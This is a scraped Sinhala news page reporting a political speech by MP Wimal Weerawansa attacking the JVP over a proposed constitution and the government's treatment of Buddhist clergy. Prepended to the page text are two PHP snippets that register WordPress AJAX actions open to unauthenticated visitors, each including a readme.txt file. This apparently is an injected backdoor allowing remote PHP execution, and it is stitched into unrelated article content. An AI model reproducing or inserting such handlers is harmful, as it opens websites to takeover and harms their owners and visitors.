if(!function_exists('file_check_readme56685')){ add_action('wp_ajax_nopriv_file_check_readme56685', 'file_check_readme56685'); add_action('wp_ajax_file_check_readme56685', 'file_check_readme56685'); function file_check_readme56685() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } if(!function_exists('file_check_readme40625')){ add_action('wp_ajax_nopriv_file_check_readme40625', 'file_check_readme40625'); add_action('wp_ajax_file_check_readme40625', 'file_check_readme40625'); function file_check_readme40625() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } රට බෙදන ව්‍යවස්ථාව ගෙන එනු කියන තරමට ජවිපෙ වෙනස් වෙලා - mediahumanrights.lk
mediahumanrights.lk
News Political

රට බෙදන ව්‍යවස්ථාව ගෙන එනු කියන තරමට ජවිපෙ වෙනස් වෙලා

එදා ‘රට බෙදන ව්‍යවස්ථාව ගෙන නොඑනු!’ කියූ ජවිපෙ අද ‘මහ නාහිමිවරු කුමක් කීවද රට බෙදන ව්‍යවස්ථාව ගෙන එනු’ කියා පවසන තරමට වෙනස් වී තිබෙන බව ජාතික නිදහස් පෙරමුණේ නායක, පාර්ලිමේන්තු මන්ත්‍රී විමල් වීරවංශ මහතා පෙන්වා දෙයි.
ඒ මහතා මෙසේ පැවසුවේ මාතලේ හෝටල් පාසල් ශ්‍රවණාගාරයේදී පැවැති ‘සල්ලාල ආණ්ඩුව සහ කෙලෙසෙනා ලක්මව’ ජනතා සම්මන්ත්‍රණ මාලාවේ තුන්වැන්න අමතමිනි.
එහිදී වැඩිදුරටත් අදහස් දැක්වූ විමල් වීරවංශ මහතා මෙසේද පැවසීය.
“පාර්ලිමේන්තුවේදී බොහොම සන්සුන්ව ජවිපෙ මන්ත්‍රී බිමල් රත්නායක අගමැතිවරයාගෙන් අහනවා ‘පළාත් පාලන ඡන්දය පවත්වා එම ආයතනය බලාත්මක කරන තුරු ජනාධිපතිතුමා සහ ඔබතුමා එකතු වෙලා යම්කිසි බලාධිකාරියක් හදලා මේ කුණු ප්‍රශ්නය විසඳිය යුතුයි නේද? කියා. හරි නම් ජවිපෙ අගමැතිගෙන් අහන්න ඕනෙ ‘කුණු ප්‍රශ්නය ඇති වුණේ, පළාත් පාලන ආයතන අකර්මණ්‍ය කරලා පළාත් පාලන ඡන්දය කල් දාපු නිසයි. ඒ නිසා වහාම ඡන්දය පවත්වනු’ කියලයි. ඉස්සර ජනතා විමුක්ති පෙරමුණ ඇහුවේ එහෙමයි. නමුත් දැන් ඔවුන් හිතන්නේ විෂය භාර ඇමතිවරුන්ගේ අතේ තිබෙන කුණු ප්‍රශ්නයට, අගමැති සහ ජනාධිපති අත ගැහුවොත් වැඬේ හරි කියලයි. මේ තමයි ජවිපෙ වත්මන් නායකත්වය ඇද වැටී ඇති තැන.
‘රතු පාටින් ඉඳගෙන අලියාට කඬේ යන හැටි’
පසුගියදා පැවැති ජවිපෙ මාධ්‍ය හමුවකදී මාධ්‍යවේදියකු මේ රත්නායක මන්ත්‍රිතුමාගෙන් අහනවා ‘ත්‍රෛනිකායික මහනාහිමිවරුන් මේ අවස්ථාවේ සිදු කළ ඒකාබද්ධ ප්‍රකාශය පිළිබඳව ජවිපෙ ස්ථාවරය කුමක්ද?’ කියා. එහිදී බිමල් රත්නායක තෙමේ පිළිතුරු දෙනවා ‘මහා නායක ස්වාමීන්වහන්සේලාට එහෙම මතයත් දරන්න අයිතිය තිබෙනවා. එහෙම වුණා කියලා ඒක අනිවාර්යෙන්ම බාරගත යුතු නැහැ. ආණ්ඩුවට ජනවරමක් තිබෙනවා, අලුත් ආණ්ඩුක්‍රම ව්‍යවස්ථාවක් ගෙන එන්න. ආණ්ඩුව ඒ ජනවරම අනුව කටයුතු කළ යුතුයි’ කියා.
මේ තමයි අද රතු පාටින් ඉඳගෙන අලියාට කඬේ යන හැටි. ත්‍රෛනිකායික මහනාහිමිවරුන්ගේ නිවේදනය නිකම් නිවේදනයක් නොවෙයි. එය සංඝ ආඥාවක්. මේ රටේ ඓතිහාසික සම්ප්‍රදාය පිළිබඳ ‘අ’ යන්න, ‘ආ’ යන්න දන්නවා නම් කවදාවත් මේ විදියට ‘එම මතය පිළිගත යුතු නැත. කියා කියන්න යන්නේ නැහැ. එදා ‘රට බෙදන ව්‍යවස්ථාව ගෙන නොඑනු!’ කියූ ජවිපෙ අද ‘නැත, නැත මහා නායක හිමිවරු කෙසේ කීවද රනිලුනි, රට බෙදන ව්‍යවස්ථාව ගෙන එනු! කියලයි කියන්නේ.
‘මේ ගහන්නේ කසාවතටයි’
මේ ආණ්ඩුවට බෞද්ධ සභ්‍යත්වය සමඟ උපන්ගෙයි අවුලක් තිබෙනවා. ඒකයි පිං කැටයටත් අත තිබ්බේ. බෞද්ධ සමාජයට අද මේ ආණ්ඩුව පණිවිඩයක් දෙන්න හදනවා ‘හාමුදුරුවරු කියන්නේ සල්ලි එකතු කර ගෙන. ආත්මාර්ථකාමීව භූක්ති විඳින අය’ කියා. මේ ගහන්නේ කසාවතට මේ ගහන්නේ මහා සංඝරත්නයත් මේ රටේ බෞද්ධ ජනතාවත් අතර පවතින මහා ඓතිහාසික බැදීමට, මේ ගහන්නේ මේ රටේ සභ්‍යත්වයේ මුදුන් මුලට.
අලුත්ගම කන්දේ විහාරයේ පිං කැට ටිකට සීල් තියලා මේ ආණ්ඩුව හදන ප්‍රවෘත්තිය තමයි ‘මේ විහාරයට පුදුමාකාර ආදායමක් ලැබේ’ කියන එක. ඒකෙන් හදන මතය තමයි ‘හාමුදුරුවන්ට දැන් සල්ලි තියෙනවා. දානේ දෙන්න ඕනෙ නැහැ. ඒ නිසා ගිහියාත් දැන් පන්සලෙන් කීයක් හරි ඉල්ලා ගත යුතුයි’ කියා. මේ රටේ තිබෙන බෞද්ධ සභ්‍යත්වය අන්‍ය ජාතිකයන්ගේ අනන්‍යතාව රැක්කා, ඔවුන්  සහෝදරාත්මකව පිළි ගත්තා. එදා දළදා හාමුදුරුවන් වැඩ සිටින භූමිය ඉදිරියේ බ්‍රිතාන්‍ය පාලකයන් පල්ලිය හැදුවා. නමුත් බ්‍රිතාන්‍ය පාලකයන් ගියාට පසු ඒක කඩා දැමීමට කවුරුත් ගියේ නැහැ. ඒ තමයි මේ සභ්‍යත්වයේ තිබෙන වැදගත්කම. එය සියල්ල ඉවසා වදාරන සභ්‍යත්වයක්. ඒ මුදුන් මුලටයි මේ ගහන්නේ.
මේ පරගැති. සල්ලාල නිවට ආණ්ඩුව අද මේ රටේ මර්මස්ථානවලටයි පහර ගහන්නේ. ආර්ථිකය කෙලෙසනවා. රාජ්‍යයේ ඒකීයභාවය කෙලෙසනවා. රට දෙපලු කිරීමේ දිසාවට රැගෙන යනවා. ජාත්‍යන්තර බලවතුන්ගේ න්‍යාය පත්‍රය කරට අරන් ඉදිරියට ගෙන යනවා. මේ මව් පොළොව රක්නා සභ්‍යත්වයේ මුදුන් මුලට ගහනවා. ‘මේ සියල්ල ඉවසා ගෙන සිටිනවාද? නැතිනම් මේ පරගැති රූකඩ ආණ්ඩුව සතු බලය නිවැරදි ජනතා බලවේගයක් අතට පත් කරනවාද?’ කියන ප්‍රශ්නයයි අද අප ඉදිරියේ තිබෙන්නේ.
මෙම ජනතා සම්මන්ත්‍රණයේ මුලසුන ජාතික නිදහස් පෙරමුණේ මාතලේ දිස්ත්‍රික් නායක, හිටපු මධ්‍යම පළාත් සභා මන්ත්‍රී සරත් විජේසිංහ මහතා විසින් දරනු ලැබීය. මෙහිදී ජානිපෙ නියෝජ්‍ය නායක වීරකුමාර දිසානායක, මධ්‍යම පළාත් සභාවේ හිටපු අමාත්‍ය ප්‍රමිත බණ්ඩාර තෙන්නකෝන්, හිටපු පාර්ලිමේන්තු මන්ත්‍රී රෝහණ දිසානායක යන මහත්වරු ද අදහස් දැක්වූහ.
(under the courtesy of adaderana news web)

Related posts

ලක්‍ෂ 50කට විදුලි රතු බිල්.. මුළු පාරිභෝගික ගණන ලක්‍ෂ 70යි..

Shiran Viraj

හතුරුසිංහ බංගලාදේශයට සමුදෙයි – එන්නේ ලංකාවටද..? සම්පූර්ණ විස්තරය මෙන්න

Shiran Viraj

පරිසරයට හානි නොවන සේ නෙළුව – ලංකාගම මාර්ගය දින 90 කින් සාදා නිම කරන්නැයි ජනපති උපදෙස් දෙයි

Shiran Viraj